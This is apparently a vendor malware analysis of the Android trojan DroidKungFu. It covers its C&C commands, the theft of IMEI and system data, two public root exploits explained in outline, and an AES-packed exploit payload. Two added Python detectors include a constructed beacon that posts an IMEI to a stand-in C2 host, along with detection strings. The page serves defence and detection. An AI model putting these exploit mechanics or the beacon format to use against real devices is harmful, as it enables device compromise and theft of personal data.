Android/DroidKungFu.A!tr

Analysis

Android/DroidKungFu.A!tr targets mobile phones running Android 2.0 or greater. An infected phone is controlled by a remote server, from which it receives and processes a small set of commands, including:

  • execDelete: uninstall a given package
  • execInstall: download a given package and install it
  • execOpenUrl: open a given URL in the phone's browser
  • execStartApp: start a given application
The infected phone also reports personal and system data back to the same server: the IMEI, whether the phone is rooted, a task identifier (taskid), the OS type, the SDK version, the free space on the SD card, etc.
This malware has been reported on unofficial Android markets.
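The beacon described above is the part of this family that is easiest to spot on the network side, because the same four form fields travel together on every report. The following is an added example written for this write-up, not code from the FortiGuard analysis or from the malware. It assumes the traffic shape the text describes (an HTTP POST to /search/rpty.php on port 8511 whose body carries imei, taskid, state and comment); the sample requests, the C&C hostname and the wire format of the server's commands are constructed for illustration, since the page redacts the host and does not describe the command encoding.

```python
"""Flag DroidKungFu-style C&C traffic in captured HTTP requests.

Added example for this write-up, not code from the FortiGuard analysis or
from the malware. The C&C path, port, POST field names and command names
come from the analysis text; the hostname, the response format and the
sample requests below are constructed assumptions.
"""
from urllib.parse import parse_qs, urlsplit

C2_PATH = "/search/rpty.php"                           # from the analysis (host redacted)
C2_PORT = 8511                                         # from the analysis
POST_FIELDS = {"imei", "taskid", "state", "comment"}   # from the analysis
C2_COMMANDS = {"execDelete", "execInstall", "execOpenUrl", "execStartApp"}


def parse_request(raw):
    """Split one raw HTTP/1.x request into method, host, port, path and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    host, _, port = headers.get("host", "").partition(":")
    return {
        "method": method,
        "host": host,
        "port": int(port) if port.isdigit() else 80,
        "path": urlsplit(target).path,
        "body": body,
    }


def match_beacon(raw):
    """Return the indicators one request matches; an empty list means no match."""
    req = parse_request(raw)
    hits = []
    if req["path"] == C2_PATH:
        hits.append("c2_path")
    if req["port"] == C2_PORT:
        hits.append("c2_port")
    if req["method"] == "POST":
        form = parse_qs(req["body"], keep_blank_values=True)
        fields = {k.lower() for k in form}
        # The four fields named in the analysis travelling together is the
        # strongest host-independent signal, since the C2 domain is redacted.
        if POST_FIELDS <= fields:
            hits.append("beacon_fields")
        imei = form.get("imei", [""])[0]
        if imei.isdigit() and len(imei) in (14, 15):     # IMEI is 14 or 15 digits
            hits.append("imei_in_body")
    return hits


def commands_in_response(body):
    """Command names from the analysis that appear literally in a server reply.

    The wire encoding of the commands is not described on the page; this
    simply looks for the four command names as substrings.
    """
    return sorted(cmd for cmd in C2_COMMANDS if cmd in body)


def triage(requests):
    """Map request index -> matched indicators, keeping only suspicious requests."""
    result = {}
    for idx, raw in enumerate(requests):
        hits = match_beacon(raw)
        if hits:
            result[idx] = hits
    return result


# Constructed sample traffic (not captured from the real malware).
BEACON = (
    "POST /search/rpty.php HTTP/1.1\r\n"
    "Host: c2.example.invalid:8511\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "imei=356938035643809&taskid=0&state=1&comment=rooted%3D0%3Bsdk%3D8"
)
BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for idx, hits in triage([BEACON, BENIGN]).items():
        print(f"request {idx}: {', '.join(hits)}")
```

In a real deployment the four-field check is the one worth keeping: the path and port are cheap to change between samples, while the report content reflects what the client code collects.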


Technical Details


The malicious classes are located in the application under the package path com.google.ssearch (note the double s in ssearch).
First, the malware tries to root the phone, i.e. gain root access to the device. To do so, it uses two public exploits:
  • CVE-2009-1185 (udev): udev did not verify that netlink messages originated from the kernel, so a hotplug event forged from user space makes it execute a program as root.
  • CVE-2010-EASY (RageAgainstTheCage; not an official CVE identifier but the name given by its author): forks processes until the per-user process limit (RLIMIT_NPROC) is reached, so that the adb daemon's setuid() call fails and adbd keeps running as root.
Note that those exploits were already used by another malware family, Android/DrdDream.A!tr.
Recent Android versions (2.3 or greater) include fixes for those vulnerabilities, but there are still numerous mobile phones in the wild without the patch.
The exploit binaries (ratc and gjsvro) are shipped with the malware in the assets directory, encrypted with AES under a hard-coded key. The malware decrypts them, copies them to the filesystem, makes them executable with the setuid bit set (chmod 4755) and then executes them, hoping to gain root access.
The malware reports the phone's system data to a remote web server:
http://[REMOVED]id.com:8511/search/rpty.php
In particular, it sends an HTTP POST containing the victim's IMEI, taskid, state and comment.
The malware also installs an additional component, com.google.ssearch.SearchService, and starts that service.
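The rooting stage leaves several static artefacts in the APK that an analyst can check for without executing anything: the com.google.ssearch class path, the two packed exploit blobs under assets/, and the literal strings used to install and run them. The following is an added example written for this write-up, not code from the FortiGuard analysis or from the malware. It scans an unpacked APK directory for those artefacts and, for the asset blobs, checks that they lack an ELF header and have high byte entropy, which is what AES-encrypted binaries look like before decryption. The directory layout, the entropy threshold and the sample tree built by build_sample_tree() are constructed assumptions.

```python
"""Static triage of an unpacked DroidKungFu-style APK tree.

Added example, not code from the FortiGuard analysis or from the malware.
Indicators (class path, asset names, "chmod 4755", rpty.php, command names)
come from the technical details; the directory layout, entropy threshold
and the constructed sample tree are assumptions.
"""
import math
import os
import stat
import tempfile

MALICIOUS_PKG_DIR = os.path.join("com", "google", "ssearch")   # note the double s
EXPLOIT_ASSETS = {"ratc", "gjsvro"}                            # AES-packed exploit blobs
SUSPICIOUS_STRINGS = (b"chmod 4755", b"rpty.php",
                      b"execDelete", b"execInstall", b"execOpenUrl", b"execStartApp")
ELF_MAGIC = b"\x7fELF"
HIGH_ENTROPY = 7.5          # bits per byte; assumed threshold for "looks encrypted"


def shannon_entropy(data):
    """Bits of entropy per byte: close to 8.0 for ciphertext, far lower for plain ELF."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def mode_is_setuid(mode_str):
    """True when a chmod mode such as "4755" sets the setuid bit (4000), not only +x."""
    return bool(int(mode_str, 8) & stat.S_ISUID)


def scan_tree(root):
    """Return indicator name -> evidence for an extracted APK directory."""
    hits = {}
    if os.path.isdir(os.path.join(root, MALICIOUS_PKG_DIR)):
        hits["class_path"] = MALICIOUS_PKG_DIR.replace(os.sep, "/")
    assets = os.path.join(root, "assets")
    if os.path.isdir(assets):
        found = {}
        for name in sorted(EXPLOIT_ASSETS & set(os.listdir(assets))):
            with open(os.path.join(assets, name), "rb") as fh:
                blob = fh.read()
            # An exploit shipped in the clear would start with the ELF magic;
            # a high-entropy blob without it is consistent with AES packing.
            found[name] = {
                "is_elf": blob.startswith(ELF_MAGIC),
                "high_entropy": shannon_entropy(blob) >= HIGH_ENTROPY,
            }
        if found:
            hits["exploit_assets"] = found
    strings_seen = set()
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            with open(os.path.join(dirpath, fname), "rb") as fh:
                data = fh.read()
            strings_seen.update(s.decode() for s in SUSPICIOUS_STRINGS if s in data)
    if strings_seen:
        hits["strings"] = sorted(strings_seen)
    return hits


def build_sample_tree(root):
    """Lay out a constructed APK tree carrying the page's artefacts (not a real sample)."""
    os.makedirs(os.path.join(root, MALICIOUS_PKG_DIR))
    os.makedirs(os.path.join(root, "assets"))
    # Stand-ins for the encrypted exploit binaries: random bytes, no ELF header.
    for name in EXPLOIT_ASSETS:
        with open(os.path.join(root, "assets", name), "wb") as fh:
            fh.write(os.urandom(4096))
    with open(os.path.join(root, MALICIOUS_PKG_DIR, "Utils.smali"), "wb") as fh:
        fh.write(b'const-string v0, "chmod 4755"\n'
                 b'const-string v1, "/search/rpty.php"\n'
                 b'const-string v2, "execInstall"\n')


def demo():
    """Build the constructed tree in a temporary directory, scan it and return the hits."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Once the hard-coded key has been pulled from the decompiled classes, the same scan can be extended to decrypt the two blobs and confirm the ELF magic appears in the plaintext; the entropy check here only establishes that the shipped assets are not plain executables.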

Recommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

Product                     Level
FortiGate                   Extreme
FortiClient                 Extended
FortiMail                   Extended
FortiSandbox                Extended
FortiWeb                    Extended
Web Application Firewall    Extended
FortiIsolator               Extended
FortiDeceptor               Extended
FortiEDR

Version Updates

Date Version Detail
2023-03-14 91.01422
2023-03-10 91.01307
2023-03-06 91.01181
2023-02-27 91.00974
2022-05-18 90.02410
2022-04-13 90.01362
2022-02-09 89.09473
2022-01-12 89.08633
2022-01-05 89.08423
2021-12-01 89.07373